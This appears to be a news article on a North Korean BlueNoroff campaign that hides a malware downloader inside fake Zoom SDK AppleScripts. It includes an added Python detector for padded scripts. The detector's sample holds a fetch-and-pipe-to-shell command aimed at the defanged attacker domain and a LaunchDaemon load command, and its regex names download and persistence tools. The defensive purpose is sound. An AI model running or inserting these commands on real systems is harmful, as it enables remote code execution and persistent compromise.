
North Korean Hackers Target Fintech and Gaming Firms with Fake Zoom Apps

The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK).


A newly uncovered cyber campaign is targeting organizations across North America, Europe, and the Asia-Pacific by exploiting fake Zoom applications. Cybersecurity experts have traced the operation to BlueNoroff, a notorious North Korean state-backed hacking group affiliated with the Lazarus Group. The campaign’s primary focus is on the gaming, entertainment, and fintech sectors, aiming to infiltrate systems and steal cryptocurrency and other sensitive financial data. 

Attack strategy 

The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK). However, hidden within the script—buried beneath roughly 10,000 blank lines—are malicious commands that quietly download malware from a counterfeit domain, zoom-tech[.]us. 

Once the malware is downloaded, it integrates itself into the system through LaunchDaemon, granting it persistent and privileged access at every system startup. This allows the malware to operate covertly without raising immediate alarms. The malicious software doesn’t stop there. It fetches additional payloads from compromised infrastructure, presenting them as legitimate macOS components like “icloud_helper” and “Wi-Fi Updater.” 

These files are designed with anti-forensics techniques to erase temporary files and conceal their activity, all while maintaining a hidden backdoor for remote control and data exfiltration. This deceptive approach is particularly dangerous in remote work environments, where minor software issues are often resolved without deep inspection—making it easier for such malware to slip past unnoticed. 
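As an added example (not from the article, Zoom, or any vendor tooling), a small Python triage check for the pattern described above: an AppleScript whose real commands sit below a very long run of blank lines and fetch remote content or install a daemon. The sample script, its path and the blank-line threshold are constructed for illustration; the counterfeit domain is kept defanged as in the article.

```python
import re

# Constructed sample: a "Zoom SDK maintenance" script padded with 10,000 blank
# lines before the hidden commands (the structure described above). The URL
# path and daemon label are placeholders, and the domain is left defanged.
SAMPLE_SCRIPT = (
    "-- Zoom SDK maintenance: refresh audio driver cache\n"
    'display dialog "Zoom SDK update in progress" buttons {"OK"}\n'
    + "\n" * 10000
    + 'do shell script "curl -s https://zoom-tech[.]us/update.sh | sh"\n'
    + 'do shell script "launchctl load /Library/LaunchDaemons/com.zoom.helper.plist"\n'
)

# Shell-outs that download/execute remote content or touch persistence locations.
SUSPICIOUS = re.compile(
    r"do shell script .*(curl|wget|osascript|launchctl|LaunchDaemons|https?://)",
    re.IGNORECASE,
)

def find_padded_payload(script_text, min_blank_run=500):
    """Return one finding per non-blank line that is either below a run of at
    least min_blank_run blank lines ("hidden") or matches SUSPICIOUS ("dangerous")."""
    findings = []
    blank_run = 0
    hidden_region = False  # set once a long blank run has been crossed
    for line_no, line in enumerate(script_text.splitlines(), start=1):
        if not line.strip():
            blank_run += 1
            continue
        if blank_run >= min_blank_run:
            hidden_region = True
        dangerous = bool(SUSPICIOUS.search(line))
        if hidden_region or dangerous:
            findings.append({"line": line_no, "blank_run_before": blank_run,
                             "hidden": hidden_region, "dangerous": dangerous,
                             "text": line.strip()})
        blank_run = 0
    return findings

def verdict(script_text, min_blank_run=500):
    """'padded-downloader' when a dangerous command is buried under padding,
    'suspicious' for a dangerous command in plain view, else 'clean'."""
    findings = find_padded_payload(script_text, min_blank_run)
    if any(f["hidden"] and f["dangerous"] for f in findings):
        return "padded-downloader"
    if any(f["dangerous"] for f in findings):
        return "suspicious"
    return "clean"

if __name__ == "__main__":
    for f in find_padded_payload(SAMPLE_SCRIPT):
        print(f)
    print(verdict(SAMPLE_SCRIPT))
```

The blank-line threshold is a tuning knob: legitimate scripts rarely carry more than a few dozen consecutive empty lines, so a few hundred is a conservative starting point.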

Motives behind the attack

BlueNoroff’s intent appears financially driven. The malware specifically searches for cryptocurrency wallet extensions, browser-stored login credentials, and authentication keys. In one known incident dated May 28, a Canadian online gambling platform fell victim to this scheme after its systems were compromised via a fraudulent Zoom troubleshooting script. 

Protection measures for organizations

Given the growing sophistication of such campaigns, security experts recommend several protective steps: 

• Independently verify Zoom participants to ensure authenticity. 

• Block suspicious domains like zoom-tech[.]us at the firewall level. 

• Deploy comprehensive endpoint protection that can detect hidden scripts and unauthorized daemons. 

• Invest in reliable antivirus and ransomware protection, especially for firms with cryptocurrency exposure. 

• Use identity theft monitoring services to detect compromised credentials early. 

• Train employees to recognize and respond to social engineering attempts. 

• Secure digital assets with hardware wallets instead of relying on software-based solutions alone.